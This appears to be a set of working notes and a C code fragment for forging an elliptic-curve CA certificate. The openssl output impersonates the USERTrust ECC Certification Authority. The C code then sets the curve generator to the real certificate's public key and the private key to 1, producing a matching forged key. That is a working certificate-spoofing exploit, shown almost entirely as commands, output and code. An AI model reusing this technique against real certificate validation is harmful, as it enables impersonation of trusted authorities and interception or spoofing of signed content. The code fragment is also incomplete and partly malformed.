$ openssl req -key p384-key.pem -new -out ca-normal.pem -x509 -set_serial 0x5c8b99c55a94c5d27156decd8980cc26 You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:US State or Province Name (full name) [Some-State]:New Jersey Locality Name (eg, city) []:Jersey City Organization Name (eg, company) [Internet Widgits Pty Ltd]:The USERTRUST nEtwork Organizational Unit Name (eg, section) []:USERTtrust ECC Common Name (e.g. server FQDN or YOUR name) []:Certification Authority Email Address []:test
$ openssl x509 -in ca-normal.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 5c:8b:99:c5:5a:94:c5:d2:71:56:de:cd:89:80:cc:26 Signature Algorithm: ecdsa-with-SHA256 Issuer: C = US, ST = New Jersey, L = Jersey City, O = "The USERTRUST nEtwork ", OU = USERTtrust ECC, CN = Certification Authority, emailAddress = test Validity Not Before: Jan 27 01:07:17 2020 GMT Not After : Feb 26 01:07:17 2020 GMT Subject: C = US, ST = New Jersey, L = Jersey City, O = "The USERTRUST nEtwork ", OU = USERTtrust ECC, CN = Certification Authority, emailAddress = test Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (384 bit) pub: 04:48:54:7d:2c:f1:52:96:70:55:91:71:e3:0a:ee: 77:38:70:2e:04:70:d1:3a:e0:b5:61:43:12:6e:81: 2f:a4:6f:aa:04:dc:25:42:09:07:be:71:3a:47:19: 5a:c0:42:99:c8:14:1e:e7:ab:3c:9f:3d:4a:c1:ad: 57:57:1a:41:53:89:da:68:69:70:95:23:0b:04:b9: 6a:6d:19:b2:9d:db:11:f2:ac:1a:2e:42:a7:b6:68: 3a:ba:31:95:7b:75:26 Field Type: prime-field Prime: 00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff: ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff: ff:ff:fe:ff:ff:ff:ff:00:00:00:00:00:00:00:00: ff:ff:ff:ff A: 00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff: ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff: ff:ff:fe:ff:ff:ff:ff:00:00:00:00:00:00:00:00: ff:ff:ff:fc B: 00:b3:31:2f:a7:e2:3e:e7:e4:98:8e:05:6b:e3:f8: 2d:19:18:1d:9c:6e:fe:81:41:12:03:14:08:8f:50: 13:87:5a:c6:56:39:8d:8a:2e:d1:9d:2a:85:c8:ed: d3:ec:2a:ef Generator (uncompressed): 04:aa:87:ca:22:be:8b:05:37:8e:b1:c7:1e:f3:20: ad:74:6e:1d:3b:62:8b:a7:9b:98:59:f7:41:e0:82: 54:2a:38:55:02:f2:5d:bf:55:29:6c:3a:54:5e:38: 72:76:0a:b7:36:17:de:4a:96:26:2c:6f:5d:9e:98: bf:92:92:dc:29:f8:f4:1d:bd:28:9a:14:7c:e9:da: 31:13:b5:f0:b8:c0:0a:60:b1:ce:1d:7e:81:9d:7a: 43:1d:7c:90:ea:0e:5f Order: 00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff: ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:c7:63:4d:81:f4: 37:2d:df:58:1a:0d:b2:48:b0:a7:7a:ec:ec:19:6a: cc:c5:29:73 Cofactor: 1 (0x1) Seed: a3:35:92:6a:a3:19:a2:7a:1d:00:89:6a:67:73:a4: 82:7a:cd:ac:73 X509v3 extensions: X509v3 Subject Key Identifier: 12:55:F0:4C:B9:95:CE:66:4C:24:75:41:57:2C:49:B0:39:93:68:80 X509v3 Authority Key Identifier: keyid:12:55:F0:4C:B9:95:CE:66:4C:24:75:41:57:2C:49:B0:39:93:68:80
$ openssl req -key prime256v1-privkey.pem -new -out prime256v1.csr You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:Test string is too long, it needs to be no more than 2 bytes long Country Name (2 letter code) [AU]:AT State or Province Name (full name) [Some-State]:TestState Locality Name (eg, city) []:TestCity Organization Name (eg, company) [Internet Widgits Pty Ltd]:TestOrg Organizational Unit Name (eg, section) []:TestUT Common Name (e.g. server FQDN or YOUR name) []:TestCOMM Email Address []:Test
Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: An optional company name []:
int bStatus = 0; do { // new a BIO memory bCert = BIO_new(BIO_s_file()); bOut = BIO_new_fp(stdout, BIO_NOCLOSE); if (bCert == NULL){ puts("[ERROR] NEW BIO ERROR"); break; } if (!BIO_read_filename(bCert, filename)){ puts("[ERROR] READ FILE ERROR"); break; } // parse cert file, here will parse like openssl x509 -in certfile -text xCert = PEM_read_bio_X509(bCert, NULL, NULL, NULL); if (xCert == NULL){ puts("[ERROR] Read the x509 cert failed"); break; } X509_print_ex(bOut, xCert, 0, X509_FLAG_NO_VERSION | X509_FLAG_NO_SIGNAME | X509_FLAG_NO_SIGDUMP | X509_FLAG_NO_EXTENSIONS | X509_FLAG_NO_AUX | X509_FLAG_NO_ATTRIBUTES | X509_FLAG_NO_IDS); publicKey = X509_get0_pubkey(xCert); if (publicKey == NULL) { puts("[ERROR] Get public key error"); break; } if (EVP_PKEY_id(publicKey) != EVP_PKEY_EC) { puts("[ERROR] This is not EC CERT"); break; } publicKey = X509_get0_pubkey(xCert); if (publicKey == NULL) { puts("[ERROR] Get the ec public key error"); break; } if (EVP_PKEY_id(publicKey) != EVP_PKEY_EC) { puts("[ERROR] This public key is not ec key!"); break; } ecPublicKey = EVP_PKEY_get0_EC_KEY(publicKey); if (ecPublicKey == NULL) { puts("[ERROR] get EC Public key from publick key error!"); break; } // Try to dup a new EC Group, with self-defined public/private key and generator EC_GROUP* tmp_ecGroup = NULL; tmp_ecGroup = EC_GROUP_dup(EC_KEY_get0_group(ecPublicKey)); if (tmp_ecGroup == NULL) { puts("[ERROR] Dup ec group error"); break; } // Set this group to explicit, that's mean we can modified it's ec parameter // public/private key and generator // this work like openssl ecparam -param_enc explicit EC_GROUP_set_asn1_flag(tmp_ecGroup, OPENSSL_EC_EXPLICIT_CURVE); // here we set new ec group generator to Public Key if (!EC_GROUP_set_generator( tmp_ecGroup, EC_KEY_get0_public_key(ecPublicKey), EC_GROUP_get0_order(EC_KEY_get0_group(ecPublicKey)), EC_GROUP_get0_cofactor(EC_KEY_get0_group(ecPublicKey)) )) { puts("[ERROR] Set new EC group generator error"); ERR_print_errors(bOut); break; } // here we copy a new EC Group, with same Pub/Priv key and generator ecGroup = tmp_ecGroup;
// update the ec public key to new ec group if (!EC_KEY_set_group(ecPublicKey, ecGroup) ){ puts("[ERROR] Set new EC group error"); break; } // here we will edit the private key to one if (!EC_KEY_set_private_key(ecPublicKey, BN_value_one())) { puts("[ERRO] Set private key failed"); break; } // Now the Pub/Priv key satisfy the pub=priv*generator
BIO_printf(bOut, "Private key set to 1\n"); EC_KEY_print(bOut, ecPublicKey, 0); // now perpare to write to new key file bKey = BIO_new(BIO_s_file()); if (!bKey) { puts("[ERROR] Create new file failed"); break; } if (!BIO_write_filename(bKey, new_filename)) { puts("[ERRO] redirect bKey to new file failed"); break; } if (!PEM_write_bio_ECPrivateKey(bKey, ecPublicKey, NULL, NULL, 0, NULL, NULL)) { puts("[ERRO] Write to new file as PEM format failed"); break; } } while (0); if (bKey) BIO_free(bKey); if (bCert) BIO_free(bCert); if (bOut) BIO_free(bOut); return0; }